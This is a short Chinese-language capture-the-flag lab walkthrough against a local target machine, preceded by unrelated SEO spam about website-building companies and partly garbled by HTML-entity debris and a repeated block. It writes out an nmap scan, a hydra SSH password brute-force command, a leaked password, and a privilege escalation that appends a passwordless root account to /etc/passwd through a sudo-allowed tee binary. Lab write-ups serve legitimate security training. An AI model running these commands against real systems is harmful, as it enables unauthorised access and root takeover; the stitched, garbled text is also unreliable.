佛山移动网站建设公司,国内免备案云主机,专业网站建设网站设计,较好网站建设公司kali#xff1a;192.168.111.111
靶机#xff1a;192.168.111.251
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --scripthttp-enum 192.168.111.251 访问目标网站发现需要登录 使用账号admin爆破出密码#xff1a;happy 登陆后抓包执行反弹shell 提权
在/home/jim/backu…kali192.168.111.111
靶机192.168.111.251
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --scripthttp-enum 192.168.111.251 访问目标网站发现需要登录 使用账号admin爆破出密码happy 登陆后抓包执行反弹shell 提权
在/home/jim/backups目录下发现密码字典 利用该字典爆破jim用户密码
hydra -l jim -P pass.txt 192.168.111.251 -s 22 ssh -t 64 查看jim用户的邮件发现用户charles的密码^xHhAhvim0y charles的sudo权限 提权方法tee | GTFOBins 写入用户到/etc/passwd
echo a::0:0::/root:/bin/bash | sudo -u root teehee -a /etc/passwd
su a flag
